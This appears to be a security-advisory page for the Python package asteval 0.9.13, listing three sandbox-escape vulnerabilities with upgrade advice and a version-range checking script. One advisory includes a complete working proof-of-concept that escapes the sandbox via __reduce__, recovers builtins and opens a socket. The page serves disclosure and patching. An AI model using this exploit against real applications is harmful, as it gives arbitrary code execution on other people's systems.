asteval@0.9.13 vulnerabilities

Safe, minimalistic evaluator of python expression using ast module

  • latest version

    1.0.6

  • latest non vulnerable version

  • first published

    13 years ago

  • latest version published

    3 months ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the asteval package. This does not include vulnerabilities belonging to this package’s dependencies.

    Vulnerability / Vulnerable version
    • High severity
    Exposed Dangerous Method or Function

    asteval is a safe, minimalistic evaluator of Python expressions using the ast module.

    Affected versions of this package are vulnerable to Exposed Dangerous Method or Function through the on_formattedvalue function. An attacker can manipulate the value of the string used in the dangerous call fmt.format(__fstring__=val) to access protected attributes by intentionally triggering an AttributeError exception. The attacker can then catch the exception and use its obj attribute to gain arbitrary access to sensitive or protected object properties.

    How to fix Exposed Dangerous Method or Function?

    Upgrade asteval to version 1.0.6 or higher.

    [,1.0.6)
    • High severity
    Exposed Dangerous Method or Function

    Affected versions of this package are vulnerable to Exposed Dangerous Method or Function. The issue stems from the library's attribute access verification, specifically the on_attribute node handler. The handler is intended to block access to sensitive Python dunder methods by checking the requested name against a list of unsafe attributes and attribute patterns. However, due to a flaw in the implementation, an attacker can alter the attribute name at runtime after the check has run, thereby bypassing the safety checks and executing arbitrary code.

    How to fix Exposed Dangerous Method or Function?

    Upgrade asteval to version 1.0.6 or higher.

    [,1.0.6)
    • High severity
    Sandbox Escape

    Affected versions of this package are vulnerable to Sandbox Escape. It is possible to escape the asteval sandbox using the __reduce__ and __reduce_ex__ methods, which expose getattr and the Interpreter instance to evaluated code.

    PoC

    #!/usr/bin/env python3
    # asteval "sandbox" escape PoC
    # Ross Bradley
    
    import asteval
    
    user_input = '''
    # reduce the asteval.Interpreter._printer function, returning a tuple
    red = print.__reduce__()
    print(red)
    
    # red[0] == getattr, red[1][0] == asteval.Interpreter instance)
    #  this is the crux of the issue - access to getattr breaks all security assumptions allowing us to access props we shouldn't be able to
    
    # give them nice names to make the following code a little clearer
    getattr = red[0]
    inst = red[1][0]
    
    # get the class for the asteval.Interpreter instance
    cls = getattr(inst, '__class__')
    
    # get an object instance from the class
    obj = getattr(cls, '__base__')
    subclasses = getattr(obj, '__subclasses__')
    
    # find the catch_warnings type
    cw = [c for c in subclasses() if c.__name__ == 'catch_warnings'][0]
    
    # fetch the reference to builtins from the catch_warnings type
    bi = cw()._module.__builtins__
    
    # import socket (wait, what?)
    socket = bi['__import__']('socket')
    
    # do socket things
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('localhost', 1234))
    s.send(b'arbitrary code execution')
    s.close()
    '''
    
    interpreter = asteval.Interpreter()
    interpreter.eval(user_input)
    

    How to fix Sandbox Escape?

    Upgrade asteval to version 0.9.23 or higher.

    [,0.9.23)
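    The three entries above give their affected ranges in Snyk's interval notation ("[,1.0.6)" means every version below 1.0.6). The following is an added example, not code from Snyk or from the asteval project, that parses that notation and reports which of this page's advisories apply to a given installed version. The advisory titles and ranges are copied from the page; the parenthesised hints in the titles are assumptions added for readability, and version strings are assumed to be purely numeric dotted releases.

```python
"""Check an asteval version against the advisory ranges listed on this page.

Added example (not Snyk's or asteval's own code). Ranges use Snyk's interval
notation: '[' / ']' are inclusive bounds, '(' / ')' exclusive, and an empty
bound means unbounded, so "[,1.0.6)" is every version strictly below 1.0.6.
"""
import re
from typing import List, Tuple

Version = Tuple[int, ...]

# Titles and ranges copied from the page; the parenthesised hints are assumptions.
ADVISORIES = [
    ("Exposed Dangerous Method or Function (on_formattedvalue)", "[,1.0.6)"),
    ("Exposed Dangerous Method or Function (on_attribute)", "[,1.0.6)"),
    ("Sandbox Escape (__reduce__ / __reduce_ex__)", "[,0.9.23)"),
]


def parse_version(text: str) -> Version:
    """Turn '0.9.13' into (0, 9, 13); pre-release or local suffixes are rejected."""
    parts = text.strip().split(".")
    if not parts or not all(p.isdigit() for p in parts):
        raise ValueError(f"unsupported version string: {text!r}")
    return tuple(int(p) for p in parts)


def cmp(a: Version, b: Version) -> int:
    """Compare two versions, padding the shorter with zeros so 1.0 == 1.0.0."""
    n = max(len(a), len(b))
    a = a + (0,) * (n - len(a))
    b = b + (0,) * (n - len(b))
    return (a > b) - (a < b)


# One bracket, optional lower bound, comma, optional upper bound, one bracket.
_RANGE = re.compile(r"^([\[(])\s*([^,]*)\s*,\s*([^\])]*)\s*([\])])$")


def version_in_range(version: str, rng: str) -> bool:
    """True if `version` lies inside a Snyk-style interval such as '[1.0,1.0.6)'."""
    m = _RANGE.match(rng.strip())
    if not m:
        raise ValueError(f"bad range: {rng!r}")
    lo_br, lo, hi, hi_br = m.groups()
    v = parse_version(version)
    lo, hi = lo.strip(), hi.strip()
    if lo:
        c = cmp(v, parse_version(lo))
        if c < 0 or (c == 0 and lo_br == "("):
            return False
    if hi:
        c = cmp(v, parse_version(hi))
        if c > 0 or (c == 0 and hi_br == ")"):
            return False
    return True


def affected_advisories(version: str) -> List[str]:
    """Titles of this page's advisories whose vulnerable range contains `version`."""
    return [title for title, rng in ADVISORIES if version_in_range(version, rng)]


if __name__ == "__main__":
    # 0.9.13 is the version this page is about; 1.0.6 is the fixed release.
    for v in ("0.9.13", "0.9.23", "1.0.6"):
        print(v, "->", affected_advisories(v) or "not affected")
```

    Run against the page's own version, 0.9.13, all three advisories are reported; 0.9.23 clears only the sandbox-escape entry, and 1.0.6 clears all of them. The comparison deliberately pads shorter versions with zeros rather than comparing strings, so that "1.0" and "1.0.0" sort as equal and "0.9.9" sorts below "0.9.23".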